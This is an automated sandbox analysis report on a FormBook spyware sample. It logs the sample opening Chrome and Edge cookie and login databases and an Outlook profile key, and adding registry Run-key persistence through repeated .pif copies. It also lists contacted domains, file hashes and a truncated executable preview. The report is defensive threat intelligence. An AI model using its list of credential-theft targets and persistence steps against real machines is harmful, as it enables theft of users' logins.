            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            11
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory113
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)612
            Process Injection
            1
            Abuse Elevation Control Mechanism
            Security Account Manager1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
            Registry Run Keys / Startup Folder
            2
            Obfuscated Files or Information
            NTDS241
            Security Software Discovery
            Distributed Component Object ModelInput Capture4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp
            LSA Secrets2
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials41
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
            Virtualization/Sandbox Evasion
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron612
            Process Injection
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            [Behavior graph: ID 1479336, sample 4Ear91jgQ7.exe, start date 23/07/2024, architecture WINDOWS, score 100]

Source | Detection | Scanner
4Ear91jgQ7.exe | 13% | ReversingLabs
4Ear91jgQ7.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif | 100% | Joe Sandbox ML
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif | 100% | Joe Sandbox ML
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif | 100% | Joe Sandbox ML
C:\Users\user\Documents\4Ear91jgQ7.pif.pif | 100% | Joe Sandbox ML
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif | 100% | Joe Sandbox ML
C:\Users\user\Documents\4Ear91jgQ7.pif | 100% | Joe Sandbox ML
C:\Users\user\Documents\4Ear91jgQ7.pif | 13% | ReversingLabs
C:\Users\user\Documents\4Ear91jgQ7.pif.pif | 13% | ReversingLabs
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif | 13% | ReversingLabs
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif | 13% | ReversingLabs
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif | 13% | ReversingLabs
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif | 13% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dual-spov-0006.spov-msedge.net | 13.107.137.11 | true | false | | unknown
www.kosherphonestore.com.cdn.hstgr.net | 84.32.84.121 | true | false | | unknown
www.cwgehkk.store | 43.155.26.241 | true | false | | unknown
shops.myshopify.com | 23.227.38.74 | true | false | | unknown
onedrive.live.com | unknown | unknown | true | | unknown
www.gospelstudygroup.org | unknown | unknown | true | | unknown
cdsf1g.db.files.1drv.com | unknown | unknown | true | | unknown
www.valerieomage.com | unknown | unknown | true | | unknown
www.instantmailer.cloud | unknown | unknown | true | | unknown
www.kosherphonestore.com | unknown | unknown | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.139.11 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
43.155.26.241 | www.cwgehkk.store | Japan | 4249 | LILLY-ASUS | false
13.107.137.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | false
84.32.84.121 | www.kosherphonestore.com.cdn.hstgr.net | Lithuania | 33922 | NTT-LT-ASLT | false
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1479336
                                Start date and time:2024-07-23 14:48:22 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 10m 58s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:75
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:4Ear91jgQ7.exe
                                renamed because original name is a hash value
                                Original Sample Name:dcf2ceb7faa5754e5fb0b7db1cc23637.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@105/17@12/5
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 98%
                                • Number of executed functions: 240
                                • Number of non-executed functions: 165
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.42.12, 20.42.73.29
                                • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, l-0003.l-msedge.net, ocsp.digicert.com, login.live.com, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, odc-db-files-geo.onedrive.akadns.net, umwatson.events.data.microsoft.com, odc-db-files-brs.onedrive.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: 4Ear91jgQ7.exe
Time | Type | Description
08:49:17 | API Interceptor | 43x Sleep call for process: 4Ear91jgQ7.exe modified
08:49:33 | API Interceptor | 80x Sleep call for process: 4Ear91jgQ7.pif modified
08:49:53 | API Interceptor | 94x Sleep call for process: 4Ear91jgQ7.pif.pif modified
08:50:19 | API Interceptor | 95x Sleep call for process: 4Ear91jgQ7.pif.pif.pif modified
08:50:27 | API Interceptor | 215418x Sleep call for process: findstr.exe modified
08:50:44 | API Interceptor | 69x Sleep call for process: 4Ear91jgQ7.pif.pif.pif.pif modified
08:51:05 | API Interceptor | 55x Sleep call for process: 4Ear91jgQ7.pif.pif.pif.pif.pif modified
08:51:05 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
14:49:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7 C:\Users\user\Documents\4Ear91jgQ7.pif
14:49:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7 C:\Users\user\Documents\4Ear91jgQ7.pif
14:49:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif
14:49:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif
14:50:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
14:50:17 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
14:50:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
14:50:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
14:50:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif
14:51:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif
14:51:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif
14:51:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif.pif C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif | Transfer copy.lnk | malicious | FormBook
C:\Users\user\Documents\4Ear91jgQ7.pif | Transfer copy.lnk | malicious | FormBook
C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif | Transfer copy.lnk | malicious | FormBook
C:\Users\user\Documents\4Ear91jgQ7.pif.pif | Transfer copy.lnk | malicious | FormBook
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.2517729157762465
                                                            Encrypted:false
                                                            SSDEEP:192:/8qCBOUeJ/0BU/KaGyFo5eZezuiFqZ24IO8un:kqCBOUeCBU/KaVkmezuiFqY4IO8un
                                                            MD5:1AF6A980203E635CE8A986A458B03A51
                                                            SHA1:879D5127425B07401348ED3955FB5469B846088D
                                                            SHA-256:6505BBE264EDE7492D3EC6D9B77366F15C099C8E0CA4B0A855ADF49E7941D24C
                                                            SHA-512:E227A0549D9328B31CE39CAA1E45058B967A3A8F9BCA48088FEDF302507BFF61B7DC92118F4CC18FCF1F9623C1A75AAE6C166EDEFDF4850AAC9823A4D937192B
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.2.1.2.6.4.7.7.4.2.1.4.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.2.1.2.6.4.9.0.7.0.2.6.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.3.8.1.c.2.7.-.7.b.4.f.-.4.f.d.c.-.b.d.3.9.-.c.b.e.1.8.1.6.b.3.f.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.b.7.a.6.2.7.-.1.6.c.c.-.4.d.c.d.-.9.9.6.a.-.f.d.2.a.7.d.8.2.2.c.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.E.a.r.9.1.j.g.Q.7...p.i.f...p.i.f...p.i.f...p.i.f.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.l.a.n.i.a.b.d.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.c.-.0.0.0.1.-.0.0.1.4.-.c.9.f.d.-.5.3.e.d.f.e.d.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.c.4.b.c.0.5.e.a.6.2.1.b.f.d.9.3.f.a.c.7.6.1.1.8.f.a.3.4.4.2.0.0.0.0.0.0.0.0.!.0.0.0.0.0.2.5.9.6.0.9.e.d.1.e.c.6.4.9.f.7.9.7.8.6.9.c.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8480
                                                            Entropy (8bit):3.709985755180127
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJVg6OZ6YEIPSU1gmfZRppr189bqMsf1Jum:R6lXJy6A6YEQSU1gmf/Wqff15
                                                            MD5:E97D1F639E8752A72D9193F59B3E032E
                                                            SHA1:C0CEDD61FEF9C8C645E663FECEF1CAA1428CDE47
                                                            SHA-256:20413D9968117A025FF156EE877865EEEEF4AB54818BD8CF9031BD765A606262
                                                            SHA-512:120D9C5A230821967070695223D917D42561092E8CCED228F2583F359E8B5B5A28FD9701833DD6322DF3D95598B7C9EA84365F5C4251FE38D24E08D46C5A7762
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.7.6.<./.P.i.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4830
                                                            Entropy (8bit):4.531308747671525
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zs4tJg77aI9SkMnWpW8VY6Ym8M4JXTFo+q8vMFs/Ju4d:uIjf4HI7xMW7VCJeKWku4d
                                                            MD5:DEE49FF13DB6021E9E4D516968860452
                                                            SHA1:D4B9007E3871D07F79343BD2909AD3B1ECC1D4DD
                                                            SHA-256:7179B34E3CA48E6CE69C621B910C631E5D476BC9ED77B9178D53ED493D018E6C
                                                            SHA-512:D578F363A353EC05599926A892A328453743810DEBD115149EF0217B21AF3F8F7832A6C32980030F8A173C70E7C712B2E73B7C10E4D7120767D355B52BAA7A96
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="423593" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 15 streams, Tue Jul 23 12:50:48 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):364841
                                                            Entropy (8bit):3.817374398771899
                                                            Encrypted:false
                                                            SSDEEP:3072:cqbjwHaFnVi7DGO4uEqOPywLTgiqYVFi+VuR2V5v7:c9CnVrO4hPyWTgi/VFiiuRYv
                                                            MD5:6D548275A68D62AAFEFAFBB1F8AFD07E
                                                            SHA1:8CC753A99D30518A45143363CDE1749981E608AE
                                                            SHA-256:BA00EEACA8E30BB55A0C07AEABBA084C7DB83C2F98F21F072D69B53F8DA55400
                                                            SHA-512:95E821B78829BF11F6BFCC1A2E3DD9037661490EC25AA866CA35FE87EAFD6893C12C0CA180E5EC6F24EB76E4C2E29A4EEA8AE37A566D7195EB4DBAB346260C83
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......(..f.........................#..........<... -......$6...i..........`.......8...........T............]...3..........\-..........H/..............................................................................eJ......./......GenuineIntel............T.......L..."..f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\findstr.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Joe Sandbox View:
                                                            • Filename: Transfer copy.lnk, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
